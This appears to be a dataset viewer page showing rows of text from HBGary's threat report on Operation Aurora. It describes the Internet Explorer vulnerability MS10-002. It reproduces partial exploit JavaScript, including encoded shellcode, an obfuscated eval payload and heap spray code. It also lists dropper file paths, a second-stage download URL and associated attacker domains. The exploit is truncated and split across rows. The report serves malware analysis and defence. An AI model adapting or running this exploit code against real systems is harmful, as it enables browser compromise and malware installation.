text
stringlengths 4
429
|
---|
Operation Aurora was published in the public domain in early
|
January 2010. Microsoft details the vulnerability in Security
|
Bulletin MS10-002. Internet Explorer 5.01, Internet Explorer
|
6, Internet Explorer 6 Service Pack 1, Internet Explorer 7, and
|
Internet Explorer 8 (except Internet Explorer 6 for supported
|
editions of Windows Server 2003) are affected. Exploit code
|
analyzed by HBGary reveals that only Internet Explorer 6
|
was targeted during Operation Aurora. This vulnerability can
|
be leveraged by attackers of varying skill levels due to the
|
JAVASCRIPT EXPLOIT CODE
|
<html>
|
<head>
|
<script>
|
var sc = unescape(
|
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8
|
db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u
|
8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u308
|
SECTION REMOVED FOR SPACE...
|
8%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342
|
%ucd8b%ub0be%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7%ubcb9%ub2f6%ubfa8%u00d8
|
var sss = Array (826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
|
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
|
SECTION REMOVED FOR SPACE...
|
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
|
735, 651, 427, 770, 301, 805, 693, 413, 875);
|
var arr = new Array;
|
for (var i = 0; i < sss.length; i ++) {
|
arr[i] = String.fromCharCode (sss [i] / 7);
|
var cc = arr.toString ();
|
cc = cc.replace (/,/g,
|
cc = cc.replace (/@/g,
|
eval (cc);
|
var x1 = new Array ();
|
for (i = 0; i < 200; i ++) {
|
x1 [i] = document.createElement (
|
COMMENT
|
x1 [i].data =
|
var e1 = null;
|
function ev1 (evt)
|
e1 = document.createEventObject (evt);
|
document.getElementById (
|
).innerHTML =
|
window.setInterval (ev2, 50);
|
function ev2 ()
|
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u
|
0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0
|
d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
|
for (i = 0; i < x1.length; i ++) {
|
x1 [i].data = p;
|
var t = e1.srcElement;
|
</script>
|
</head>
|
<body>
|
<span id=
|
><IMG SRC=
|
aaa.gif
|
onload=
|
ev1(event)
|
width=
|
height=
|
></span>
|
</body>
|
</html>
|
HB GARY THREAT REPORT: OPERATION AURORA
|
public availability of the Metasploit module
|
ie_aurora.rb
|
The exploit code used by the original attackers was quickly
|
improved and added to Metasploit thus greatly expanding the
|
potential number of attackers and reliability of code.
|
The JavaScript performs a heap spray attack and injects
|
the embedded shellcode described below. The JavaScript
|
exploits the vulnerability in Internet Explorer by copying,
|
releasing, and then referencing a Document Object Model
|
(DOM) element.
|
JAVASCRIPT ARTIFACTS
|
PATTERN
|
Initial encrypted dropper download.
|
Deleted file.
|
C:\%appdata%\a.exe
|
Decrypted dropper. Deleted file.
|
C:\%appdata\b.exe
|
JavaScript present in Internet Explorer
|
memory space.
|
<code listed above>
|
Download URL present in internet
|
history during memory analysis.
|
http://demo1.ftpaccess.cc/
|
demo/ad.jpg
|
Other domains associated
|
with Aurora.
|
sl1.homelinux.org
|
360.homeunix.com
|
ftp2.homeunix.com
|
update.ourhobby.com
|
blog1.servebeer.com
|
The shellcode exists as a Unicode escaped variable (sc)
|
in the malicious JavaScript listed below. Upon successful
|
exploitation of Internet Explorer, the shellcode will download
|
an obfuscated second stage executable from http://demo1.
|
ftpaccess.cc/demo/ad.jpg which is the dropper. Note: these
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.